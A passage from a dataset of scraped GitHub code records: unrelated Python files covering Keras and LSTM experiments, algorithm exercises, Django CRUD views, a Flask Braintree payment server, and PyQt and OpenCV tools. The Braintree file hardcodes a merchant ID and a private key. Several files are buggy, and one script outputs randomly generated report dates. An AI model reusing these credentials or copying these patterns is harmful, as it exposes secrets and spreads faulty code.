autoencoder.load_weights('news20/models/final-model.hdf5')\n\n projections = encoder.predict(data)\n\n # tsne = TSNE(n_components=2, perplexity=20.0, learning_rate=1000, early_exaggeration=2)\n # projections = tsne.fit_transform(projections)\n\n plt.figure()\n plt.scatter(projections[:, 0], projections[:, 1], c=labels, s=1)\n plt.show()\n\n\nif __name__ == '__main__':\n data, labels = news20_data()\n visualize(data, labels)\n","repo_name":"vaaale/contrastive-divergence","sub_path":"news20/visualize_news20.py","file_name":"visualize_news20.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15422549460","text":"'''\n완전 탐색 문제\n\n1부터 n까지 문제에 적혀있는 대로 풀면 된다.\n - 어떤 자연수 N이 있을 때, 그 자연수 N의 분해합은 N과 N을 이루는 각 자리수의 합을 의미한다.\n - 245의 분해합은 256( = 245 + 2 + 4 + 5)\n\n1부터 n까지 돌면서 1씩 증가하는 반복문 내에서 분해합을 구하는 식 i + sum(map(int, str(i)))을 한 후에\n이 값이 입력받은 n과 같으면 해당 숫자를 출력하고 종료(어차피 1씩 증가하기 때문에 처음 res랑 n이 같을 경우가 가장 작은 생성자이다.)\n끝까지 돌았는데 없을 경우 0출력\n'''\n\nn = int(input())\n\n# 테스트\n# n = 216 # 198\n\nres = 0\n\nfor i in range(1, n + 1):\n res = i + sum(map(int, str(i)))\n\n if res == n:\n print(i)\n break\nelse:\n print(0)\n","repo_name":"rkdalsdn94/algoalgo","sub_path":"solved_ac/bronze_2/분해합_2231.py","file_name":"분해합_2231.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71049865531","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\n\n\n\n# Any results you write to the current directory are saved as output.\nimport numpy as np \n\nimport pandas as pd \n\nimport nltk\n\nimport os\n\nfrom nltk.tokenize import word_tokenize\n\nfrom nltk.stem import WordNetLemmatizer\n\nfrom bs4 import BeautifulSoup\n\nimport re\n\nfrom keras.utils import to_categorical\n\nimport random\n\nfrom tensorflow import set_random_seed\n\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.preprocessing import sequence\n\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.layers import Dense,Dropout,Embedding,LSTM\n\nfrom keras.callbacks import EarlyStopping\n\nfrom keras.losses import categorical_crossentropy\n\nfrom keras.optimizers import Adam\n\nfrom keras.models import Sequential\n\nfrom tqdm import tqdm\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=UserWarning, module='bs4')\n\nlemmatizer = WordNetLemmatizer()\n\n\n\n#set random seed for the session and also for tensorflow that runs in background for keras\n\nset_random_seed(123)\n\nrandom.seed(123)\n\n\n\n\n\nprint(os.listdir(\"../input\"))\ntrain= pd.read_csv(\"../input/train.tsv\", sep=\"\\t\")\n\ntest = pd.read_csv(\"../input/test.tsv\", sep=\"\\t\")\n\n\n\ntrain.head()\ntrain.shape\ntest.head()\ndef clean_sentences(df):\n\n reviews = []\n\n\n\n for sent in tqdm(df['Phrase']):\n\n \n\n #remove html content\n\n review_text = BeautifulSoup(sent).get_text()\n\n \n\n #remove non-alphabetic characters\n\n review_text = re.sub(\"[^a-zA-Z]\",\" \", review_text)\n\n \n\n #tokenize the sentences\n\n words = word_tokenize(review_text.lower())\n\n \n\n #lemmatize each word to its lemma\n\n lemma_words = [lemmatizer.lemmatize(i) for i in words]\n\n \n\n reviews.append(lemma_words)\n\n\n\n return(reviews)\n\n\n\n#cleaned reviews for both train and test set retrieved\n\ntrain_sentences = clean_sentences(train)\n\ntest_sentences = clean_sentences(test)\n\nprint(len(train_sentences))\n\nprint(len(test_sentences))\ntarget=train.Sentiment.values\n\ny_target=to_categorical(target)\n\nnum_classes=y_target.shape[1]\nX_train,X_val,y_train,y_val=train_test_split(train_sentences,y_target,test_size=0.2,stratify=y_target)\n #It is needed for initializing tokenizer of keras and subsequent padding\n\n\n\nunique_words = set()\n\nlen_max = 0\n\n\n\nfor sent in tqdm(X_train):\n\n \n\n unique_words.update(sent)\n\n \n\n if(len_maxReport Date<,>Report\")\nelif (fileText[1] == \"onlyreturndates\"):\n print(\"Req No.<,>Report Date\")\nelse:\n print(\"ERROR: input file layout error\")\n sys.exit()\n\ndata = preprocess.getData()\n\nsimilarReports = search.search(\"lsi\",50,fileText[0])\nfor reportIdx in similarReports:\n year = random.randint(2000,int(fileText[2][0:4])-1)\n month = random.randint(1,12)\n date = random.randint(1,28)\n if (fileText[1] == \"notonlyreturndates\"):\n print(data[reportIdx[0]][0] + \"<,>\" + str(year) + str(month).zfill(2) + str(date).zfill(2) + \"<,>\" + data[reportIdx[0]][1])\n elif (fileText[1] == \"onlyreturndates\"):\n print(data[reportIdx[0]][0] + \"<,>\" + str(year) + str(month).zfill(2) + 
str(date).zfill(2))\n","repo_name":"ghcarneiro/rahrad","sub_path":"searchEngine.py","file_name":"searchEngine.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26104063391","text":"import http.client\nimport json\nconn = http.client.HTTPSConnection(\"api.smspartner.fr\")\n\npayload = json.dumps({\n\"apiKey\": \"your api key smspartner\", #remplacez par votre clé API SMSPartner\n\"phoneNumbers\": \"+336xxxxxxxx\", #remplacez par votre numéro de téléphone\n\"sender\": \"Your sender name\",\n\"gamme\": 1,\n\"message\": \"Cest un message test PYTHON\", #remplacez par votre message\n \"webhookUrl\": \"https://webhook.site/TOKEN\" #remplacez TOKEN par votre token webhook.site **cette ligne est optionnel**\n})\n\nheaders = {\n'Content-Type': 'application/json',\n'Content-Length': str(len(payload)),\n'cache-control': 'no-cache'\n}\n\nconn.request(\"POST\", \"/v1/send\", payload, headers) #Une requête POST est envoyée au serveur SMSPartner avec le chemin d'URL \"/v1/send\"\n\nres = conn.getresponse() #La réponse est ensuite stockée dans la variable res.\n\ndata = res.read() \n\nprint(data.decode(\"utf-8\")) #Cette ligne lit les données de la réponse HTTP.","repo_name":"AgustinGomezDelToro/SMS-API-PYTHON","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36045176217","text":"\"\"\"empty message\n\nRevision ID: 35ee0d6723ef\nRevises: 299feceab0d4\nCreate Date: 2023-03-14 21:43:44.131500\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '35ee0d6723ef'\ndown_revision = '299feceab0d4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('posts', schema=None) as batch_op:\n batch_op.drop_column('author')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
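    # Caveat: re-adding `author` as NOT NULL to a non-empty `posts` table can
    # fail or silently backfill empty strings depending on the MySQL SQL mode.
    # A common hedge is an explicit placeholder default (value illustrative):
    # sa.Column('author', mysql.VARCHAR(length=255), nullable=False,
    #           server_default='unknown')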
###\n with op.batch_alter_table('posts', schema=None) as batch_op:\n batch_op.add_column(sa.Column('author', mysql.VARCHAR(length=255), nullable=False))\n\n # ### end Alembic commands ###\n","repo_name":"as2229181/flask_picture","sub_path":"migrations/versions/35ee0d6723ef_.py","file_name":"35ee0d6723ef_.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27172824467","text":"\"\"\"\nCreated on Tue Dec 14 17:31 2021\n@author: pg\n\nProgram for handling mouse events\nGoals:\n\n- the user has a main image (in our case, the raman image displayed after applying data reduction methods)\n- the user wants to click on the specific part of the image and display the raman spectrum of the corresponding pixel.\n- the mouse event would extract a 1D array representing a single raman spectrum from the original dataset.\n- the mouse event would trigger plotting the extracted data on the figure.\n\n\"\"\"\nimport cv2\nimport numpy as np\nimport mat73\nimport matplotlib.pyplot as plt\n\nmatFile = mat73.loadmat('tissue_t3_1_workspace.mat')\nimage = matFile[\"m\"] #For the purpose of testing the function, the spectra come from different source, they are not coming from 'm' image\ndata = matFile['map_t3']\n\ndef printCoordinate(event,x,y,flags,params): # MOUSE CALL BACK FUNCTION, IT SHOULD TAKE 4 FOLLOWING PARAMETERS\n if event==cv2.EVENT_LBUTTONDOWN:\n strXY = '('+str(x)+','+str(y)+')'\n print(strXY) # prints x,y coordinates to terminal\n spectrum = data[x][y][:]\n title = 'spectrum of the pixel {}x{}'.format(x,y)\n plt.ion() # enables interactive mode - plots spectra on the same grap\n plt.plot(spectrum)\n plt.title(title)\n plt.show()\n\ncv2.imshow('Image',image)\n\n# Whenever a mouse even occurs we have to call the function:\ncv2.setMouseCallback('Image', printCoordinate) #Take 2 parameters:\n# - the window name on which look for the mouse event to occur,\n# - the function to be called whenever the mouse event occurs\n\ncv2.waitKey() # close the image whenever any key is pressed\ncv2.destroyAllWindows()\n","repo_name":"molbioeng/Visualisers","sub_path":"clickShowSpectrum.py","file_name":"clickShowSpectrum.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13807529949","text":"#!/usr/bin/env python3\n\nimport os\n\nimport braintree\n\nprint(braintree)\n\nbraintree.Configuration.configure(braintree.Environment.Sandbox,\n merchant_id=\"855p4hj8rkrnc5sd\",\n public_key=\"9k8zgmzxbfqyfz37\",\n private_key=\"78250b73760b6dbd2d97d4e04cdd7f93\")\n\n \nimport flask\napp = flask.Flask(__name__)\n\n@app.route(\"/client_token\", methods=[\"GET\"])\ndef client_token():\n return braintree.ClientToken.generate()\n\n@app.route(\"/payment-methods\", methods=[\"POST\"])\ndef create_purchase():\n nonce = request.form[\"payment_method_nonce\"]\n result = braintree.Transaction.sale({\n \"amount\": \"20.00\",\n \"payment_method_nonce\": nonce\n })\n return result.transaction.id\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n","repo_name":"Sally-Yang-Jing-Ou/TwrlyPebble","sub_path":"braintree-server/thing.py","file_name":"thing.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"15146251492","text":"#Character stuffing \n\nflag = 'F'\nesc = 'E'\n\ndef 
byte_stuffing(text):\n global flag,esc\n bstuffed_data = ''\n bstuffed_data += flag\n for i in text:\n if i == flag:\n bstuffed_data += esc\n bstuffed_data += i \n elif i == esc:\n bstuffed_data += esc \n bstuffed_data += i \n else:\n bstuffed_data += i\n bstuffed_data += flag\n return bstuffed_data\n\n\ndef byte_destuffing(text):\n global flag,esc\n bdstuffed_text = ''\n added = False\n for i in range(1, len(text)-1):\n if added == True:\n added = False\n continue\n if text[i] == esc:\n if text[i+1] == flag or text[i+1] == esc:\n bdstuffed_text += text[i+1]\n added = True\n else:\n bdstuffed_text += text[i]\n return bdstuffed_text\n\n#Sample\n#Input : FDEFDFF\n#output : Stuffed - FEFDEEEFDEFEFF\n # Destuffed - FDEFDFF\n\ntext = input(\"Message: \")\nsenders_text = byte_stuffing(text)\nrecv_text = byte_destuffing(senders_text)\nprint(f\"Stuffed : {senders_text}\")\nprint(f\"Destuffed : {recv_text}\")\n\n","repo_name":"Rishit-Reddy/Computer-Networks-Lab-Programs","sub_path":"3_Bit&Character_stuffing_destuffing/char_stuffing_destuffing.py","file_name":"char_stuffing_destuffing.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10238448637","text":"from collections import Counter\r\nimport logging\r\n\r\ns = [1,1,2,2,3,3,3,3,3,1,2,4,5,3,4,5,5]\r\n\r\nd = Counter(s)\r\nprint(d.most_common)\r\nprint(max(d))\r\n\r\nd = lambda a,b : a ** b\r\nprint(d(5,3))\r\n\r\n\r\n\r\n","repo_name":"shivashanker525/Python_Intrvw_qstns","sub_path":"counter_p.py","file_name":"counter_p.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14025592173","text":"import numpy as np\nfrom .node import HealthNode\nfrom .consumers import ConsumerNode\n\n\nclass ResourceProducerNode(HealthNode, ConsumerNode):\n def __init__(\n self,\n id,\n *args,\n max_resource_production=100.0,\n resource_production_rate=10.0,\n resource_production_bias=10.0,\n production_damage_rate=100,\n **kwargs,\n ) -> None:\n super().__init__(id, *args, **kwargs)\n self.max_resource_production = max_resource_production\n self.resource_production_rate = resource_production_rate\n self.resource_production_bias = resource_production_bias\n self.production_damage_rate = production_damage_rate\n self.current_production = 0.0\n self.fails = 0\n\n def set_consumption(self):\n low_production = max(\n self.max_resource_production - self.resource_production_bias, 0.0\n )\n production = np.random.uniform(\n low=low_production, high=self.max_resource_production\n )\n self.current_consumption = production * self.resource_production_rate\n self.current_production = 0.0\n return super().set_consumption()\n\n def feed(self, power):\n if not self.allow_production():\n self.fails += 1\n return power\n if power <= 0:\n return 0.0\n used_power = min(power, self.current_consumption)\n production_reminder = self._produce(used_power)\n reminder = production_reminder + (power - used_power)\n if reminder > 0:\n self.status = ConsumerNode.Status.ON\n else:\n self.status = ConsumerNode.Status.PARTIAL\n\n return reminder\n\n def _produce(self, power):\n production = power / self.resource_production_rate\n production_damage = production / self.production_damage_rate\n if self.health < production_damage:\n production_damage = self.health\n production = self.health * self.production_damage_rate\n consumed_power = production * self.resource_production_rate\n self.health -= 
production_damage\n self.current_production += production\n self.current_consumption -= consumed_power\n return consumed_power\n\n def color(self):\n if self.status == ConsumerNode.Status.OFF:\n return \"pink\"\n elif self.status == ConsumerNode.Status.PARTIAL:\n return \"yellow\"\n elif self.status == ConsumerNode.Status.ON:\n return \"black\"\n\n def allow_production(self):\n \"\"\"Allow production if the node has health\"\"\"\n p = np.random.uniform(0.0, 1.0) ** 2\n p *= 100\n return self.health > p\n\n def repair(self, resources):\n self.fails = 0\n return super().repair(resources)\n\n def size(self):\n return 200 * (self.current_production + 1)\n\n def to_json(self):\n parent_node = super().to_json()\n node = {\n \"id\": self.id,\n \"type\": \"ResourceProducer\",\n \"max_resource_production\": self.max_resource_production,\n \"resource_production_rate\": self.resource_production_rate,\n \"resource_production_bias\": self.resource_production_bias,\n \"production_damage_rate\": self.production_damage_rate,\n }\n parent_node.update(node)\n return parent_node\n","repo_name":"dfg-98/IA-SIM","sub_path":"models/producers.py","file_name":"producers.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5980224439","text":"from django.shortcuts import render,redirect\nfrom app01 import models\nfrom django import forms\nfrom django.core.validators import RegexValidator\nfrom django.core.exceptions import ValidationError\nfrom django.utils.safestring import mark_safe\ndef depart_list(request):\n '''部门列表'''\n #去数据库获取所有的部门列表\n queryset=models.Department.objects.all()\n return render(request,'depart_list.html',{'queryset':queryset})\n\ndef depart_add(request):\n '''添加部门'''\n if request.method=='GET':\n return render(request, 'depart_add.html')\n\n #获取用户POST提交过来的数据(title输入为空)\n title=request.POST.get('title')\n #保存到数据库\n models.Department.objects.create(title=title)\n #重定向回部门列表\n return redirect('/depart_list/')\n\ndef depart_delete(request):\n #获取id\n nid = request.GET.get('nid')\n #删除\n models.Department.objects.filter(id=nid).delete()\n #重定向部门列表\n # 一般情况下会跳转到列表信息\n return redirect('/depart_list/')\n#通过nid,传参保留原本的数据\ndef depart_edit(request,nid):\n '''修改部门'''\n if request.method == 'GET':\n #根据nid,获取他的数据[obj,]\n row_object=models.Department.objects.filter(id=nid).first()\n print(row_object.id,row_object.title)\n return render(request,'depart_edit.html',{'row_object':row_object})\n\n # 获取用户POST提交过来的修改的数据\n title = request.POST.get('title')\n # 保存到数据库\n models.Department.objects.filter(id=nid).update(title=title)\n # 重定向回部门列表\n return redirect('/depart_list/')\n\ndef user_list(request):\n queryset = models.UserInfo.objects.all()\n return render(request, 'user_list.html', {'queryset': queryset})\n\ndef user_add(request):\n '''添加用户(最原始方法)'''\n if request.method=='GET':\n #context表示从models拿数据过来\n context={\n 'gender_choices':models.UserInfo.gender_choices,\n 'depart_list':models.Department.objects.all()}\n return render(request, 'user_add.html', context)\n\n\n #获取用户POST提交过来的数据(title输入为空)\n user=request.POST.get('user')\n pwd = request.POST.get('pwd')\n age = request.POST.get('age')\n account = request.POST.get('account')\n create_time = request.POST.get('create_time')\n depart_id = request.POST.get('depart_id')\n gender = request.POST.get('gender')\n\n\n\n\n # #获取用户提交的数据,将数据保存到数据库\n models.UserInfo.objects.create(name=user)\n models.UserInfo.objects.create(password=pwd)\n 
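    # Note: each objects.create() call in this view writes a separate row with
    # just one field set, so a single submission produces seven fragmentary
    # UserInfo records. The conventional fix is one call carrying every field:
    # models.UserInfo.objects.create(
    #     name=user, password=pwd, age=age, account=account,
    #     create_time=create_time, depart_id=depart_id, gender=gender)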
models.UserInfo.objects.create(age=age)\n models.UserInfo.objects.create(account=account)\n models.UserInfo.objects.create(create_time=create_time)\n models.UserInfo.objects.create(depart_id=depart_id)\n models.UserInfo.objects.create(gender=gender)\n\n #将添加的用户返回到用户列表,就是重定向回部门列表\n return redirect('/user_list/')\n\n\n\n#----------------modelform示例(#基于modelform版本)-------------------\nfrom django import forms\nclass UserModelForm(forms.ModelForm):\n class Meta:\n model=models.UserInfo\n fields=['name','password','age','account','create_time','gender','depart_id']\n #通过Django后台进行前端输入框的显示:第一种方式\n # widgets={\n # 'name':forms.TextInput(attrs={'class':'form-control'}),\n # 'password': forms.TextInput(attrs={'class': 'form-control'}),\n # 'age': forms.TextInput(attrs={'class': 'form-control'}),\n # }\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n #循环找到所有的插件,添加'class':'form-control',让前端页面输入框中显示灰色底部提示标题\n for name,field in self.fields.items():\n field.widget.attrs={'class':'form-control','placeholder':field.label}\n\ndef user_model_form_add(request):\n if request.method=='GET':\n form=UserModelForm()\n return render(request,'user_model_form_add.html',{'form':form})\n\n #用户提交数据,数据校验。\n form = UserModelForm(data=request.POST)\n if form.is_valid():\n #判断数据是否合法,保存到数据库(第一种)\n # print(form.cleaned_data)\n #一般情况form内部会识别到用户提交的数据,将用户提交的数据保存到数据库form.save()\n form.save()\n return redirect('/user_list/')\n # 校验失败并在页面上显示错误信息\n return render(request,'user_model_form_add.html',{'form':form})\n\ndef user_edit(request,nid):\n '''编辑用户'''\n #根据ID去数据库获取要编辑的那一行数据(对象)\n if request.method == 'GET':\n row_object=models.UserInfo.objects.filter(id=nid).first()\n form=UserModelForm(instance=row_object)\n return render(request,'user_edit.html',{'form':form})\n\n row_object = models.UserInfo.objects.filter(id=nid).first()\n form = UserModelForm(data=request.POST,instance=row_object)#更新到数据库\n if form.is_valid():\n form.save()\n return redirect('/user_list/')\n\n return render(request, 'user_edit.html', {'form': form})\n\ndef user_delete(request,nid):\n \n # 删除\n models.UserInfo.objects.filter(id=nid).delete()\n # 重定向部门列表\n # 一般情况下会跳转到列表信息\n return redirect('/user_list/')\n\n\ndef pretty_list(request):\n # 搜索框关键字搜索\n data_dict = {}\n search_data = request.GET.get('q', '') # 有值和空值\n if search_data:\n data_dict['mobile__contains'] = search_data\n res = models.PrettyNum.objects.filter(**data_dict)\n print(res)\n\n #此处添加循环是为了实现分页功能添加的数据使用\n # for i in range(300):\n # models.PrettyNum.objects.create(mobile='18697949601',price=10,level=1,status=1)\n page=int(request.GET.get('page',1))\n #第一种实现分页,实现每页显示10条数据\n # start=(page-1)*10\n # end=page*10\n #第二种可以进行定义变量,实现修改数字改变显示的数据条数\n page_num=10\n start = (page - 1) * page_num\n end = page * page_num\n\n\n\n\n\n #当数据过多时,在前端页面进行分页过于繁琐时,可以通过Django后台进行分页的一个循环\n page_str_list=[]\n\n # for i in range(1,21):\n #将page_string返回给前端页面展示,同时在下面的返回页面参数加上page_string\n #计算数据库有多少条数据,实现进行一个分页循环,其中循环21页显然是死代码,所以必须进行计算总条数\n total_count=models.PrettyNum.objects.filter(**data_dict).order_by('-level').count()\n\n #计算总页数, 将for i in range(1,21):的21替换成total_page_count+1\n total_page_count,div=divmod(total_count,page_num)#涉及到取余计算\n if div:\n total_page_count+=1\n\n for i in range(1, total_page_count+1):\n ele='
<li><a href=\"?page={}\">{}</a></li>
  • '.format(i,i)\n page_str_list.append(ele)\n page_string=mark_safe(''.join(page_str_list))\n\n\n #select*from 表order by level desc;根据等级进行排序\n queryset = models.PrettyNum.objects.filter(**data_dict).order_by('-level')[start:end]#次处加上[start:end]是实现上面的分页功能\n return render(request, 'pretty_list.html', {'queryset': queryset,'search_data':search_data,'page_string':page_string})\n\n\nclass PrettyModelForm(forms.ModelForm):\n #使用正则表达式对添加手机号码时进行一个验证,方法一:\n mobile=forms.CharField(\n label='手机号',\n validators=[RegexValidator(r'^1[3-9]\\d{9}$','手机号格式错误')],\n )\n\n\n\n\n # # 通过构子的方法对添加手机号进行验证,第二种:\n # def clean_mobile(self):\n # txt_mobile=self.cleaned_data['mobile']\n #\n # if len(txt_mobile)!=11:\n # #杨验证不通过\n # raise ValidationError('格式错误')\n # #验证通过,用户输入的值返回\n # return txt_mobile\n\n\n\n\n class Meta:\n model=models.PrettyNum\n #展示字段内容第一种\n fields=['mobile','price','level','status']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # 循环找到所有的插件,添加'class':'form-control'\n for name, field in self.fields.items():\n field.widget.attrs = {'class': 'form-control', 'placeholder': field.label}\n\n # 当添加手机号时,数据库已经存在该号码,可以通过构子的方法对添加手机号进行重复验证功能,\n # 但此处功能存在运行错误,问题还未解决\n # def clean_mobile(self):\n # txt_mobile = self.cleaned_data['mobile']\n # exists = models.PrettyNum.objects.filter(models=txt_mobile).exists()\n #\n # if exists:\n # # 验证不通过\n # raise ValidationError('手机号码已经存在')\n # # 验证通过,用户输入的值返回\n # return txt_mobile\n\n\n\nclass PrettyEditModelForm(forms.ModelForm):\n\n\n #不修改手机号的情况下,但是使用此语句那么fields列表中必须加回原来的mobile\n # mobile=forms.CharField(disabled=True,label='手机号')\n #重新定义靓号编辑的类,与靓号增加的类进行一个区分使用\n class Meta:\n model=models.PrettyNum\n #展示字段内容方法一,当不展示手机号时可以进行去除,也可以使用语句mobile=forms.CharField(disabled=True,label='手机号')\n fields=['price','level','status']\n #展示字段第二种,表示展示全部\n # fields='__all__'\n #展示字段内容第三种,表示除了一下字段不展示,排除展示法\n # exclude=['level']\n #通过Django后台进行前端输入框的显示:第一种方式\n # widgets={\n # 'name':forms.TextInput(attrs={'class':'form-control'}),\n # 'password': forms.TextInput(attrs={'class': 'form-control'}),\n # 'age': forms.TextInput(attrs={'class': 'form-control'}),\n # }\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n #循环找到所有的插件,添加'class':'form-control'\n for name,field in self.fields.items():\n field.widget.attrs={'class':'form-control','placeholder':field.label}\n#还可以使用上面的正则表达式验证手机号的方法\n # mobile = forms.CharField(\n # label='手机号',\n # validators=[RegexValidator(r'^1[3-9]\\d{9}$', '手机号格式错误')],\n # )\n\n\n\n\n\ndef pretty_add(request):\n if request.method=='GET':\n form=PrettyModelForm()\n return render(request,'pretty_add.html',{'form':form})\n\n #用户提交数据,数据校验。\n form = PrettyModelForm(data=request.POST)\n if form.is_valid():\n #判断数据是否合法,保存到数据库(第一种)\n # print(form.cleaned_data)\n #一般情况form内部会识别到用户提交的数据,将用户提交的数据保存到数据库form.save()\n form.save()\n return redirect('/pretty_list/')\n # 校验失败并在页面上显示错误信息\n return render(request,'pretty_add.html',{'form':form})\n\ndef pretty_edit(request,nid):\n if request.method == 'GET':\n row_object = models.PrettyNum.objects.filter(id=nid).first()\n form = PrettyEditModelForm(instance=row_object)\n return render(request, 'pretty_edit.html', {'form': form})\n\n row_object = models.PrettyNum.objects.filter(id=nid).first()\n form = PrettyEditModelForm(data=request.POST, instance=row_object) # 更新到数据库\n if form.is_valid():\n form.save()\n return redirect('/pretty_list/')\n\n return render(request, 'pretty_edit.html', {'form': form})\n\n\ndef pretty_delete(request, nid):\n # 删除\n 
models.PrettyNum.objects.filter(id=nid).delete()\n # 重定向部门列表\n # 一般情况下会跳转到列表信息\n return redirect('/pretty_list/')\n\n#订单管理使用到ajax知识\n\nclass OrderModelForm(forms.ModelForm):\n\n class Meta:\n model=models.Order\n #展示字段内容第一种\n fields=['oid','title','price','status','admin']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # 循环找到所有的插件,添加'class':'form-control'\n for name, field in self.fields.items():\n field.widget.attrs = {'class': 'form-control', 'placeholder': field.label}\n\ndef order_list(request):\n queryset = models.UserInfo.objects.all()\n return render(request, 'order_list.html', {'queryset': queryset})\n\n\ndef order_add(request):\n if request.method=='GET':\n form=OrderModelForm()\n return render(request,'order_add.html',{'form':form})\n\n #用户提交数据,数据校验。\n form = OrderModelForm(data=request.POST)\n if form.is_valid():\n #判断数据是否合法,保存到数据库(第一种)\n # print(form.cleaned_data)\n #一般情况form内部会识别到用户提交的数据,将用户提交的数据保存到数据库form.save()\n form.save()\n return redirect('/order_list/')\n # 校验失败并在页面上显示错误信息\n return render(request,'order_add.html',{'form':form})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"whiteshirt5/python-django","sub_path":"app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13455,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16996333887","text":"from PyQt5.QtWidgets import *\nfrom PyQt5 import QtGui, QtCore\nfrom PyQt5.QtGui import QIcon, QFont, QCursor, QPixmap\nfrom PyQt5.QtCore import Qt, QSize, QCoreApplication\nimport sys\nimport airCargoTrack\nimport seaCargoTrack\n\nair = {'Air France':\"\",'Air Royal':\"\",'Ethiopian':\"\",'Turkish Airlines':\"\",'DHL':\"\",'FedEx':\"\",'UPS Air Cargo' : \"\",'EgyptAir':\"\",'British Airways':\"\"}\nctnList = []\n\nclass Ui_self(QWidget):\n def __init__(self):\n super().__init__()\n if not self.objectName():\n self.setObjectName(u\"self\")\n self.verticalLayout_2 = QVBoxLayout(self)\n self.verticalLayout_2.setObjectName(u\"verticalLayout_2\")\n self.verticalLayout = QVBoxLayout()\n self.verticalLayout.setObjectName(u\"verticalLayout\")\n self.title = QLabel(self)\n self.title.setObjectName(u\"title\")\n font = QFont()\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.title.setFont(font)\n self.title.setAlignment(Qt.AlignCenter)\n\n self.verticalLayout.addWidget(self.title)\n\n self.horizontalLayout = QHBoxLayout()\n self.horizontalLayout.setObjectName(u\"horizontalLayout\")\n self.horizontalLayout.setContentsMargins(8, 10, 8, 10)\n self.trackingNumFrame = QFrame(self)\n self.trackingNumFrame.setObjectName(u\"trackingNumFrame\")\n self.trackingNumFrame.setMinimumSize(QSize(0, 0))\n self.trackingNumFrame.setMaximumSize(QSize(16777215, 30))\n self.trackingNumFrame.setStyleSheet(u\"background-color : white;\\n\"\n\"border : 1px solid gray;\\n\"\n\"border-radius : 10px;\")\n self.trackingNumFrame.setFrameShape(QFrame.StyledPanel)\n self.trackingNumFrame.setFrameShadow(QFrame.Raised)\n self.horizontalLayout_2 = QHBoxLayout(self.trackingNumFrame)\n self.horizontalLayout_2.setObjectName(u\"horizontalLayout_2\")\n self.searchIco = QLabel(self.trackingNumFrame)\n self.searchIco.setObjectName(u\"searchIco\")\n self.searchIco.setSizeIncrement(QSize(0, 0))\n self.searchIco.setStyleSheet(u\"background-color : transparent;\\n\"\n\"border : none;\")\n self.searchIco.setPixmap(QPixmap(u\":/icon/search.svg\"))\n self.searchIco.setScaledContents(True)\n\n self.horizontalLayout_2.addWidget(self.searchIco)\n\n 
self.trackingNumberLine = QLineEdit(self.trackingNumFrame)\n self.trackingNumberLine.setObjectName(u\"trackingNumberLine\")\n self.trackingNumberLine.setStyleSheet(u\"background-color : transparent;\\n\"\n\"border : none;\")\n self.trackingNumberLine.textChanged.connect(self.textChamps)\n\n self.horizontalLayout_2.addWidget(self.trackingNumberLine)\n\n\n self.horizontalLayout.addWidget(self.trackingNumFrame)\n\n self.typeShipment = QComboBox(self)\n self.typeShipment.addItem(\"\")\n self.typeShipment.addItem(\"\")\n self.typeShipment.addItem(\"\")\n self.typeShipment.setObjectName(u\"typeShipment\")\n self.typeShipment.setMinimumSize(QSize(0, 30))\n self.typeShipment.currentTextChanged.connect(self.AircompanyTextCombo)\n\n self.horizontalLayout.addWidget(self.typeShipment)\n\n self.airCompanyList = ['Air France','Air Royal','Ethiopian','Turkish Airlines','DHL','FedEx','UPS Air Cargo','EgyptAir','British Airways']\n self.seaCompanyList = ['Mediterranean Shipping Company (MSC)','Maers','CMA CGM','COSCO','Hapag-Lloyd','Pacific International Lines (PIL)']\n self.companiesBox = QComboBox(self)\n self.companiesBox.setObjectName(u\"companiesBox\")\n 